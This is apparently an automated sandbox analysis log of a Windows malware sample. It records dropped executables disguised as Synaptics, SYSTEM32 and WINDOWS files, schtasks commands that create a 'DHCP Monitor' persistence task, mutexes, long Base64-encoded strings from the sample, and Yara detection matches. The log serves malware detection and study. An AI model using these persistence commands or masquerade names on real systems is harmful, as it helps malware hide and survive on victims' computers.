            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\SYSTEM32.EXE "C:\Users\user\Desktop\SYSTEM32.EXE" Jump to behavior
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeProcess created: C:\Users\user\Desktop\WINDOWS.EXE "C:\Users\user\Desktop\WINDOWS.EXE" Jump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exeJump to behavior
            Source: C:\Users\user\Desktop\WINDOWS.EXEProcess created: C:\Users\user\Desktop\._cache_WINDOWS.EXE "C:\Users\user\Desktop\._cache_WINDOWS.EXE" Jump to behavior
            Source: C:\Users\user\Desktop\WINDOWS.EXEProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\ProgramData\Synaptics\._cache_Synaptics.exe "C:\ProgramData\Synaptics\._cache_Synaptics.exe"
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,9_2_00475958
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEFile created: C:\Users\user\AppData\Local\Temp\tmp939D.tmp
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00409ED2 GetDiskFreeSpaceA,9_2_00409ED2
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXESection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXESection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXESection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXESection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXESection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: SYSTEM32.EXE.6.dr, eVWbregzvU/yvcwMXCsTRJU.csBase64 encoded string: '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
            Source: 7.0.SYSTEM32.EXE.da0000.0.unpack, eVWbregzvU/yvcwMXCsTRJU.csBase64 encoded string: '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
            Source: 7.2.SYSTEM32.EXE.da0000.0.unpack, eVWbregzvU/yvcwMXCsTRJU.csBase64 encoded string: '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
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEMutant created: \Sessions\1\BaseNamedObjects\Global\{fd5fd13e-0f57-4bfb-84a4-034a7f99c7fe}
            Source: C:\Users\user\Desktop\SYSTEM32.EXEMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_01
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeCommand line argument: shell32.dll6_2_003C1320
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeCommand line argument: ShellExecuteA6_2_003C1320
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeCommand line argument: RBIND6_2_003C1320
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeCommand line argument: C<6_2_003C4330
            Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\ohdSUNQ.ini
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3fef190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
